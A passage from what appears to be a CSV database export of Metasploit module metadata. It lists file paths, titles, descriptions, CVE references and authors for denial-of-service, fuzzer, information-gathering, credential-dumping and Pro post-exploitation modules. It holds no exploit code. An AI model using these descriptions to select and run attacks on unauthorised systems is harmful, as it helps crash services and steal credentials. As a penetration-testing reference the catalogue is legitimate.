00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb","auxiliary","dos/windows/smtp/ms06_019_exchange","auxiliary/dos/windows/smtp/ms06_019_exchange","MS06-019 Exchange MODPROP Heap Overflow",300,"This module triggers a heap overflow vulnerability in MS Exchange that occurs when multiple malformed MODPROP values occur in a VCAL request.","Metasploit Framework License (BSD)","f","2004-11-12 00:00:00",,,"aggressive","t","BID-17908, CVE-2006-0027, MSB-MS06-019","pusscat " 1291,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb","auxiliary","dos/windows/ssh/sysax_sshd_kexchange","auxiliary/dos/windows/ssh/sysax_sshd_kexchange","Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service",300,"This module sends a specially-crafted SSH Key Exchange causing the service to crash.","Metasploit Framework License (BSD)","f","2013-03-17 00:00:00",,,"aggressive","t","OSVDB-92081, URL-http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html","Matt ""hostess"" Andreko " 1292,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/tftp/pt360_write.rb","auxiliary","dos/windows/tftp/pt360_write","auxiliary/dos/windows/tftp/pt360_write","PacketTrap TFTP Server 2.2.5459.0 DoS",300,"The PacketTrap TFTP server version 2.2.5459.0 can be brought down by sending a special write request.","Metasploit Framework License (BSD)","f","2008-10-29 00:00:00",,,"aggressive","t","CVE-2008-1311, EDB-6863, OSVDB-42932","kris katterjohn " 1293,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/tftp/solarwinds.rb","auxiliary","dos/windows/tftp/solarwinds","auxiliary/dos/windows/tftp/solarwinds","SolarWinds TFTP Server 10.4.0.10 Denial of Service",300,"The SolarWinds TFTP server can be shut down by sending a 'netascii' read request with a specially crafted file name.","Metasploit Framework License (BSD)","f","2010-05-21 00:00:00",,,"aggressive","t","CVE-2010-2115, EDB-12683, OSVDB-64845","Nullthreat" 1294,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wireshark/chunked.rb","auxiliary","dos/wireshark/chunked","auxiliary/dos/wireshark/chunked","Wireshark chunked_encoding_dissector function DOS",300,"Wireshark crash when dissecting an HTTP chunked response. Versions affected: 0.99.5 (Bug 1394)","Metasploit Framework License (BSD)","f","2007-02-22 00:00:00",,,"aggressive","t","CVE-2007-3389, OSVDB-37643, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394","Matteo Cantoni " 1295,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wireshark/cldap.rb","auxiliary","dos/wireshark/cldap","auxiliary/dos/wireshark/cldap","Wireshark CLDAP Dissector DOS",300,"This module causes infinite recursion to occur within the CLDAP dissector by sending a specially crafted UDP packet.","Metasploit Framework License (BSD)","f","2011-03-01 00:00:00",,,"aggressive","t","CVE-2011-1140, OSVDB-71552, URL-http://www.wireshark.org/security/wnpa-sec-2011-04.html, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717","joernchen (Phenoelit)>" 1296,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wireshark/ldap.rb","auxiliary","dos/wireshark/ldap","auxiliary/dos/wireshark/ldap","Wireshark LDAP dissector DOS",300,"The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet.","Metasploit Framework License (BSD)","f","2008-03-28 00:00:00",,,"aggressive","t","CVE-2008-1562, OSVDB-43840","MC " 1297,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb","auxiliary","fuzzers/dns/dns_fuzzer","auxiliary/fuzzers/dns/dns_fuzzer","DNS and DNSSEC Fuzzer",300,"This module will connect to a DNS server and perform DNS and DNSSEC protocol-level fuzzing. Note that this module may inadvertently crash the target server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"pello " 1298,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ftp/client_ftp.rb","auxiliary","fuzzers/ftp/client_ftp","auxiliary/fuzzers/ftp/client_ftp","Simple FTP Client Fuzzer",300,"This module will serve an FTP server and perform FTP client interaction fuzzing","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r " 1299,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb","auxiliary","fuzzers/ftp/ftp_pre_post","auxiliary/fuzzers/ftp/ftp_pre_post","Simple FTP Fuzzer",300,"This module will connect to a FTP server and perform pre- and post-authentication fuzzing","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"corelanc0d3r , jduck " 1300,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/http/http_form_field.rb","auxiliary","fuzzers/http/http_form_field","auxiliary/fuzzers/http/http_form_field","HTTP Form Field Fuzzer",300,"This module will grab all fields from a form, and launch a series of POST actions, fuzzing the contents of the form fields. You can optionally fuzz headers too (option is enabled by default)","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer","Paulino Calderon , corelanc0d3r" 1301,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/http/http_get_uri_long.rb","auxiliary","fuzzers/http/http_get_uri_long","auxiliary/fuzzers/http/http_get_uri_long","HTTP GET Request URI Fuzzer (Incrementing Lengths)",300,"This module sends a series of HTTP GET request with incrementing URL lengths.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"nullthreat" 1302,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb","auxiliary","fuzzers/http/http_get_uri_strings","auxiliary/fuzzers/http/http_get_uri_strings","HTTP GET Request URI Fuzzer (Fuzzer Strings)",300,"This module sends a series of HTTP GET request with malicious URIs.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"nullthreat" 1303,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb","auxiliary","fuzzers/smb/smb2_negotiate_corrupt","auxiliary/fuzzers/smb/smb2_negotiate_corrupt","SMB Negotiate SMB2 Dialect Corruption",300,"This module sends a series of SMB negiotiate requests that advertise a SMB2 dialect with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1304,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb","auxiliary","fuzzers/smb/smb_create_pipe","auxiliary/fuzzers/smb/smb_create_pipe","SMB Create Pipe Request Fuzzer",300,"This module sends a series of SMB create pipe requests using malicious strings.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1305,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb","auxiliary","fuzzers/smb/smb_create_pipe_corrupt","auxiliary/fuzzers/smb/smb_create_pipe_corrupt","SMB Create Pipe Request Corruption",300,"This module sends a series of SMB create pipe requests with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1306,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb","auxiliary","fuzzers/smb/smb_negotiate_corrupt","auxiliary/fuzzers/smb/smb_negotiate_corrupt","SMB Negotiate Dialect Corruption",300,"This module sends a series of SMB negiotiate requests with corrupted bytes","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1307,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb","auxiliary","fuzzers/smb/smb_ntlm1_login_corrupt","auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt","SMB NTLMv1 Login Request Corruption",300,"This module sends a series of SMB login requests using the NTLMv1 protocol with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1308,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb","auxiliary","fuzzers/smb/smb_tree_connect","auxiliary/fuzzers/smb/smb_tree_connect","SMB Tree Connect Request Fuzzer",300,"This module sends a series of SMB tree connect requests using malicious strings.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1309,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb","auxiliary","fuzzers/smb/smb_tree_connect_corrupt","auxiliary/fuzzers/smb/smb_tree_connect_corrupt","SMB Tree Connect Request Corruption",300,"This module sends a series of SMB tree connect requests with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1310,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb","auxiliary","fuzzers/smtp/smtp_fuzzer","auxiliary/fuzzers/smtp/smtp_fuzzer","SMTP Simple Fuzzer",300,"SMTP Simple Fuzzer","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ietf.org/rfc/rfc2821.txt","justme" 1311,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb","auxiliary","fuzzers/ssh/ssh_kexinit_corrupt","auxiliary/fuzzers/ssh/ssh_kexinit_corrupt","SSH Key Exchange Init Corruption",300,"This module sends a series of SSH requests with a corrupted initial key exchange payload.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1312,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb","auxiliary","fuzzers/ssh/ssh_version_15","auxiliary/fuzzers/ssh/ssh_version_15","SSH 1.5 Version Fuzzer",300,"This module sends a series of SSH requests with malicious version strings.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1313,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb","auxiliary","fuzzers/ssh/ssh_version_2","auxiliary/fuzzers/ssh/ssh_version_2","SSH 2.0 Version Fuzzer",300,"This module sends a series of SSH requests with malicious version strings.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1314,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb","auxiliary","fuzzers/ssh/ssh_version_corrupt","auxiliary/fuzzers/ssh/ssh_version_corrupt","SSH Version Corruption",300,"This module sends a series of SSH requests with a corrupted version string","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1315,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb","auxiliary","fuzzers/tds/tds_login_corrupt","auxiliary/fuzzers/tds/tds_login_corrupt","TDS Protocol Login Request Corruption Fuzzer",300,"This module sends a series of malformed TDS login requests.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1316,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/tds/tds_login_username.rb","auxiliary","fuzzers/tds/tds_login_username","auxiliary/fuzzers/tds/tds_login_username","TDS Protocol Login Request Username Fuzzer",300,"This module sends a series of malformed TDS login requests.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1317,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb","auxiliary","fuzzers/wifi/fuzz_beacon","auxiliary/fuzzers/wifi/fuzz_beacon","Wireless Beacon Frame Fuzzer",300,"This module sends out corrupted beacon frames.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1318,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb","auxiliary","fuzzers/wifi/fuzz_proberesp","auxiliary/fuzzers/wifi/fuzz_proberesp","Wireless Probe Response Frame Fuzzer",300,"This module sends out corrupted probe response frames.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1319,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/android_htmlfileprovider.rb","auxiliary","gather/android_htmlfileprovider","auxiliary/gather/android_htmlfileprovider","Android Content Provider File Disclosure",300,"This module exploits a cross-domain issue within the Android web browser to exfiltrate files from a vulnerable device.","Metasploit Framework License (BSD)","f",,,"WebServer","passive","t",,"Thomas Cannon, jduck " 1320,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb","auxiliary","gather/apple_safari_webarchive_uxss","auxiliary/gather/apple_safari_webarchive_uxss","Apple Safari .webarchive File Format UXSS",300,"This module exploits a security context vulnerability that is inherent in Safari's .webarchive file format. The format allows you to specify both domain and content, so we can run arbitrary script in the context of any domain. This allows us to steal cookies, file URLs, and saved passwords from any website we want -- in other words, it is a universal cross-site scripting vector (UXSS). On sites that link to cached javascripts, we can additionally poison user's browser cache and install keyloggers.","Metasploit Framework License (BSD)","f","2013-02-22 00:00:00",,"WebServer","passive","t","URL-https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format","joev" 1321,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/checkpoint_hostname.rb","auxiliary","gather/checkpoint_hostname","auxiliary/gather/checkpoint_hostname","CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure",300,"This module sends a query to the port 264/TCP on CheckPoint Firewall-1 firewalls to obtain the firewall name and management station (such as SmartCenter) name via a pre-authentication request. The string returned is the CheckPoint Internal CA CN for SmartCenter and the firewall host. Whilst considered ""public"" information, the majority of installations use detailed hostnames which may aid an attacker in focusing on compromising the SmartCenter host, or useful for government, intelligence and military networks where the hostname reveals the physical location and rack number of the device, which may be unintentionally published to the world.","Metasploit Framework License (BSD)","f","2011-12-14 00:00:00",,,"aggressive","t","URL-http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure, URL-https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360","patrick " 1322,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/citrix_published_applications.rb","auxiliary","gather/citrix_published_applications","auxiliary/gather/citrix_published_applications","Citrix MetaFrame ICA Published Applications Scanner",300,"This module attempts to query Citrix Metaframe ICA server to obtain a published list of applications.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.securiteam.com/exploits/5CP0B1F80S.html","patrick " 1323,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/citrix_published_bruteforce.rb","auxiliary","gather/citrix_published_bruteforce","auxiliary/gather/citrix_published_bruteforce","Citrix MetaFrame ICA Published Applications Bruteforcer",300,"This module attempts to brute force program names within the Citrix Metaframe ICA server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-5817, OSVDB-50617, URL-http://sh0dan.org/oldfiles/hackingcitrix.html","patrick " 1324,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/coldfusion_pwd_props.rb","auxiliary","gather/coldfusion_pwd_props","auxiliary/gather/coldfusion_pwd_props","ColdFusion 'password.properties' Hash Extraction",300,"This module uses a directory traversal vulnerability to extract information such as password, rdspassword, and ""encrypted"" properties. This module has been tested successfully on ColdFusion 9 and ColdFusion 10. Use actions to select the target ColdFusion version.","Metasploit Framework License (BSD)","f","2013-05-07 00:00:00",,"ColdFusion10","aggressive","t","EDB-25305, OSVDB-93114","HTP, nebulus, sinn3r " 1325,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/corpwatch_lookup_id.rb","auxiliary","gather/corpwatch_lookup_id","auxiliary/gather/corpwatch_lookup_id","CorpWatch Company ID Information Search",300,"This module interfaces with the CorpWatch API to get publicly available info for a given CorpWatch ID of the company. If you don't know the CorpWatch ID, please use the corpwatch_lookup_name module first.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://api.corpwatch.org/","Brandon Perry " 1326,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/corpwatch_lookup_name.rb","auxiliary","gather/corpwatch_lookup_name","auxiliary/gather/corpwatch_lookup_name","CorpWatch Company Name Information Search",300,"This module interfaces with the CorpWatch API to get publicly available info for a given company name. Please note that by using CorpWatch API, you acknolwdge the limitations of the data CorpWatch provides, and should always verify the information with the official SEC filings before taking any action.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://api.corpwatch.org/","Brandon Perry " 1327,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/d20pass.rb","auxiliary","gather/d20pass","auxiliary/gather/d20pass","General Electric D20 Password Recovery",300,"The General Electric D20ME and possibly other units (D200?) feature TFTP readable configurations with plaintext passwords. This module retrieves the username, password, and authentication level list.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t",,"K. Reid Wightman " 1328,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/dns_bruteforce.rb","auxiliary","gather/dns_bruteforce","auxiliary/gather/dns_bruteforce","DNS Brutefoce Enumeration",300,"This module uses a dictionary to perform a bruteforce attack to enumerate hostnames and subdomains available under a given domain.","BSD License","f",,,,"aggressive","t",,"Carlos Perez " 1329,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/dns_info.rb","auxiliary","gather/dns_info","auxiliary/gather/dns_info","DNS Basic Information Enumeration",300,"This module enumerates basic DNS information for a given domain. The module gets information regarding to A (addresses), AAAA (IPv6 addresses), NS (name servers), SOA (start of authority) and MX (mail servers) records for a given domain. In addition, this module retrieves information stored in TXT records.","BSD License","f",,,,"aggressive","t",,"Carlos Perez " 1330,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/dns_reverse_lookup.rb","auxiliary","gather/dns_reverse_lookup","auxiliary/gather/dns_reverse_lookup","DNS Reverse Lookup Enumeration",300,"This module performs DNS reverse lookup against a given IP range in order to retrieve valid addresses and names.","BSD License","f",,,,"aggressive","t",,"Carlos Perez " 1331,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/dns_srv_enum.rb","auxiliary","gather/dns_srv_enum","auxiliary/gather/dns_srv_enum","DNS Common Service Record Enumeration",300,"This module enumerates common DNS service records in a given domain. By setting the ALL_DNS to true, all the name servers of a given domain are used for enumeration. Otherwise only the system dns is used for enumration. in order to get all the available name servers for the given domain the SOA and NS records are queried. In order to convert from domain names to IP addresses queries for A and AAAA (IPv6) records are used.","BSD License","f",,,,"aggressive","t",,"Carlos Perez " 1332,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/eaton_nsm_creds.rb","auxiliary","gather/eaton_nsm_creds","auxiliary/gather/eaton_nsm_creds","Network Shutdown Module <= 3.21 (sort_values) Credential Dumper",300,"This module will extract user credentials from Network Shutdown Module by exploiting a vulnerability found in lib/dbtools.inc, which uses unsanitized user input inside a eval() call. Please note that in order to extract credentials,the vulnerable service must have at least one USV module (an entry in the ""nodes"" table in mgedb.db)","Metasploit Framework License (BSD)","f","2012-06-26 00:00:00",,,"aggressive","t","OSVDB-83199, URL-http://secunia.com/advisories/49103/","h0ng10, sinn3r " 1333,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/enum_dns.rb","auxiliary","gather/enum_dns","auxiliary/gather/enum_dns","DNS Record Scanner and Enumerator ",300,"This module can be used to gather information about a domain from a given DNS server by performing various DNS queries such as zone transfers, reverse lookups, SRV record bruteforcing, and other techniques.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0532, OSVDB-492","Carlos Perez " 1334,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/external_ip.rb","auxiliary","gather/external_ip","auxiliary/gather/external_ip","Discover External IP via Ifconfig.me",300,"This module checks for the public source IP address of the current route to the RHOST by querying the public web application at ifconfig.me. It should be noted this module will register activity on ifconfig.me, which is not affiliated with Metasploit.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://ifconfig.me/ip","RageLtMan" 1335,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/impersonate_ssl.rb","auxiliary","gather/impersonate_ssl","auxiliary/gather/impersonate_ssl","HTTP SSL Certificate Impersonation",300,"This module request a copy of the remote SSL certificate and creates a local (self.signed) version using the information from the remote version. The module then Outputs (PEM|DER) format private key / certificate and a combined version for use in Apache or other Metasploit modules requiring SSLCert Inputs for private key / CA cert have been provided for those with diginator certs hanging about!","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles","Chris John Riley" 1336,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/natpmp_external_address.rb","auxiliary","gather/natpmp_external_address","auxiliary/gather/natpmp_external_address","NAT-PMP External Address Scanner",300,"Scan NAT devices for their external address using NAT-PMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Jon Hart " 1337,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/search_email_collector.rb","auxiliary","gather/search_email_collector","auxiliary/gather/search_email_collector","Search Engine Domain Email Address Collector",300,"This module uses Google, Bing and Yahoo to create a list of valid email addresses for the target domain.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Carlos Perez " 1338,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/shodan_search.rb","auxiliary","gather/shodan_search","auxiliary/gather/shodan_search","Shodan Search",300,"This module uses the SHODAN API to query the database and returns the first 50 IPs. SHODAN accounts are free & output can be sent to a file for use by another program. Results can also populated into the services table in the database. NOTE: SHODAN filters (port, hostname, os, geo, city) can be used in queries, but the free API does not allow net, country, before, and after filters. An unlimited API key can be purchased from the Shodan site to use those queries. The 50 result limit can also be raised to 10,000 for a small fee. API: http://www.shodanhq.com/api_doc FILTERS: http://www.shodanhq.com/help/filters","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"John Sawyer , sinn3r " 1339,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb","auxiliary","gather/wp_w3_total_cache_hash_extract","auxiliary/gather/wp_w3_total_cache_hash_extract","W3-Total-Cache Wordpress-plugin 0.9.2.4 (or before) Username and Hash Extract",300,"The W3-Total-Cache Wordpress Plugin <= 0.9.24 can cache database statements and it's results in files for fast access. Version 0.9.2.4 has been fixed afterwards so it can be vulnerable. These cache files are in the webroot of the Wordpress installation and can be downloaded if the name is guessed. This modules tries to locate them with brute force in order to find usernames and password hashes in these files. W3 Total Cache must be configured with Database Cache enabled and Database Cache Method set to Disk to be vulnerable","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-88744, URL-http://seclists.org/fulldisclosure/2012/Dec/242","Christian Mehlmauer , Jason A. Donenfeld " 1340,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/xbmc_traversal.rb","auxiliary","gather/xbmc_traversal","auxiliary/gather/xbmc_traversal","XBMC Web Server Directory Traversal",300,"This module exploits a directory traversal bug in XBMC 11, up until the 2012-11-04 nightly build. The module can only be used to retrieve files.","Metasploit Framework License (BSD)","f","2012-11-04 00:00:00",,,"aggressive","t","URL-http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348, URL-http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf, URL-https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335","Lucas ""acidgen"" Lundgren IOActive, Matt ""hostess"" Andreko , sinn3r " 1341,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/pdf/foxit/authbypass.rb","auxiliary","pdf/foxit/authbypass","auxiliary/pdf/foxit/authbypass","Foxit Reader Authorization Bypass",300,"This module exploits a authorization bypass vulnerability in Foxit Reader build 1120. When a attacker creates a specially crafted pdf file containing a Open/Execute action, arbitrary commands can be executed without confirmation from the victim.","Metasploit Framework License (BSD)","f","2009-03-09 00:00:00",,,"aggressive","t","BID-34035, CVE-2009-0836, OSVDB-55615","Didier Stevens , MC " 1342,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/bruteforce.rb","auxiliary","pro/bruteforce","auxiliary/pro/bruteforce","PRO: Brute Force Authentication",300,"Gain access to various services using brute force modules","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1343,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/cleanup.rb","auxiliary","pro/cleanup","auxiliary/pro/cleanup","PRO: Compromised Host Cleanup",300,"Shut down sessions and clean up user actions","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1344,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/collect.rb","auxiliary","pro/collect","auxiliary/pro/collect","PRO: Compromised Host Data Collection",300,"Collect information from compromised systems","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1345,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/discover.rb","auxiliary","pro/discover","auxiliary/pro/discover","PRO: Host and Service Discovery",300,"Locate hosts and services","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1346,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/download.rb","auxiliary","pro/download","auxiliary/pro/download","PRO: Download a File",300,"Download a specific file path through a session","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1347,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/exploit.rb","auxiliary","pro/exploit","auxiliary/pro/exploit","PRO: Exploitation",300,"Gain access to system using exploits","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1348,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/handler.rb","auxiliary","pro/handler","auxiliary/pro/handler","PRO: Payload Handler",300,"Starts an instance of exploit/multi/handler","Rapid7 Proprietary","f",,,,"aggressive","t",,"egypt " 1349,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/import.rb","auxiliary","pro/import","auxiliary/pro/import","PRO: Data Importer",300,"Process a data file","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1350,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/import_creds.rb","auxiliary","pro/import_creds","auxiliary/pro/import_creds","PRO: Credential Importer",300,"Import credential files: user lists, password lists, userpass lists, and pwdump files","Rapid7 Proprietary","f",,,,"aggressive","t",,"todb " 1351,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/listener.rb","auxiliary","pro/listener","auxiliary/pro/listener","PRO: Payload Listener",300,"Starts a pre-configured payload listener","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1352,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/creds_exploiter.rb","auxiliary","pro/minions/creds_exploiter","auxiliary/pro/minions/creds_exploiter","PRO: Credential Exploiter",300,"Command and Control for the Credential Exploiter Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1353,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/hash_key_recycler.rb","auxiliary","pro/minions/hash_key_recycler","auxiliary/pro/minions/hash_key_recycler","PRO: SMB Hash/SSH Key Recycler",300,"Command and Control for the Hash/Key Recycler Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1354,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/pass_the_hash.rb","auxiliary","pro/minions/pass_the_hash","auxiliary/pro/minions/pass_the_hash","PRO: Pass the Hash",300,"Command and Control for Pass the Hash Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1355,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/password_recycler.rb","auxiliary","pro/minions/password_recycler","auxiliary/pro/minions/password_recycler","PRO: Password Recycler",300,"Command and Control for the Password Recycler Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1356,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/ssh_key_recycler.rb","auxiliary","pro/minions/ssh_key_recycler","auxiliary/pro/minions/ssh_key_recycler","PRO: SSH Key Recycler",300,"Command and Control for the SSH Key Recycler Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1357,"2013-05-30 